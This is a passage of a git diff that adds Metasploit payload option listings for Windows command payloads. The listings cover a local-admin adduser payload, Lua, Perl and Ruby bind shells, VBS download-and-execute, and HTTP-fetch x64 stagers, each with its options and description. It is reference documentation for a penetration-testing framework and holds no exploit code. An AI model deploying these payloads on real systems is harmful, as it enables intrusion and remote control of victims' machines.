InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + ZSHPath zsh yes The path to the ZSH executable + diff --git a/msfvenom/payload_options/cmd-windows-adduser.txt b/msfvenom/payload_options/cmd-windows-adduser.txt new file mode 100644 index 0000000..4160bf2 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-adduser.txt @@ -0,0 +1,42 @@ + + Name: Windows Execute net user /ADD CMD + Module: payload/cmd/windows/adduser + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 97 + Rank: Normal + +Provided by: + hdm + scriptjunkie + Chris John Riley + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CUSTOM no Custom group name to be used instead of default +PASS Metasploit$1 yes The password for this user +USER metasploit yes The username to create +WMIC false yes Use WMIC on the target to resolve administrators group + +Description: + Create a new user and add them to local administration group. + + Note: The specified password is checked for common complexity + requirements to prevent the target machine rejecting the user + for failing to meet policy requirements. + + Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + COMPLEXITY true yes Check password for complexity rules + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_lua.txt b/msfvenom/payload_options/cmd-windows-bind_lua.txt new file mode 100644 index 0000000..a7437c6 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_lua.txt @@ -0,0 +1,32 @@ + + Name: Windows Command Shell, Bind TCP (via Lua) + Module: payload/cmd/windows/bind_lua + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 218 + Rank: Normal + +Provided by: + xistence + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via Lua + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + LuaPath lua yes The path to the Lua executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_perl.txt b/msfvenom/payload_options/cmd-windows-bind_perl.txt new file mode 100644 index 0000000..43fd199 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_perl.txt @@ -0,0 +1,34 @@ + + Name: Windows Command Shell, Bind TCP (via Perl) + Module: payload/cmd/windows/bind_perl + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 139 + Rank: Normal + +Provided by: + Samy + cazz + aushack + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl (persistent) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_perl_ipv6.txt b/msfvenom/payload_options/cmd-windows-bind_perl_ipv6.txt new file mode 100644 index 0000000..bb28656 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_perl_ipv6.txt @@ -0,0 +1,34 @@ + + Name: Windows Command Shell, Bind TCP (via perl) IPv6 + Module: payload/cmd/windows/bind_perl_ipv6 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 140 + Rank: Normal + +Provided by: + Samy + cazz + aushack + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl (persistent) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_ruby.txt b/msfvenom/payload_options/cmd-windows-bind_ruby.txt new file mode 100644 index 0000000..fe13d44 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_ruby.txt @@ -0,0 +1,32 @@ + + Name: Windows Command Shell, Bind TCP (via Ruby) + Module: payload/cmd/windows/bind_ruby + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 128 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Continually listen for a connection and spawn a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RubyPath ruby yes The path to the Ruby executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-download_eval_vbs.txt b/msfvenom/payload_options/cmd-windows-download_eval_vbs.txt new file mode 100644 index 0000000..2555076 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-download_eval_vbs.txt @@ -0,0 +1,34 @@ + + Name: Windows Executable Download and Evaluate VBS + Module: payload/cmd/windows/download_eval_vbs + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 126 + Rank: Normal + +Provided by: + scriptjunkie + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +DELETE false yes Delete created .vbs after download +INCLUDECMD false yes Include the cmd /q /c +INCLUDEWSCRIPT false yes Include the wscript command +URL yes The pre-encoded URL to the script + +Description: + Downloads a file from an HTTP(S) URL and executes it as a vbs script. + Use it to stage a vbs encoded payload from a short command line. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-download_exec_vbs.txt b/msfvenom/payload_options/cmd-windows-download_exec_vbs.txt new file mode 100644 index 0000000..9846fdb --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-download_exec_vbs.txt @@ -0,0 +1,33 @@ + + Name: Windows Executable Download and Execute (via .vbs) + Module: payload/cmd/windows/download_exec_vbs + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 315 + Rank: Normal + +Provided by: + scriptjunkie + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +DELETE true yes Delete created .vbs after download +EXT exe yes The extension to give the saved file +INCLUDECMD false yes Include the cmd /q /c +URL yes The pre-encoded URL to the executable + +Description: + Download an EXE from an HTTP(S) URL and execute it + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-generic.txt b/msfvenom/payload_options/cmd-windows-generic.txt new file mode 100644 index 0000000..aabc922 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-generic.txt @@ -0,0 +1,30 @@ + + Name: Windows Command, Generic Command Execution + Module: payload/cmd/windows/generic + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute + +Description: + Executes the supplied command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp.txt new file mode 100644 index 0000000..038d3bb --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp.txt @@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/custom/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME BoBBvvomkrO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..a8c7b9b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME SUQmikdjmM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_named_pipe.txt new file mode 100644 index 0000000..2660f29 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_named_pipe.txt @@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/custom/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ajFBcdvHADDU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SHELLCODE_FILE no Shellcode bin to launch +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp.txt new file mode 100644 index 0000000..0139d7d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp.txt @@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/custom/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZaHBoQkpto no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_rc4.txt new file mode 100644 index 0000000..c4958e3 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_rc4.txt @@ -0,0 +1,82 @@ + + Name: HTTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/custom/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME WhOFFnYbbG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_uuid.txt new file mode 100644 index 0000000..1da0229 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-bind_tcp_uuid.txt @@ -0,0 +1,77 @@ + + Name: HTTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/custom/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME chjwYLJXHh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_http.txt new file mode 100644 index 0000000..7ea3fe3 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_http.txt @@ -0,0 +1,97 @@ + + Name: 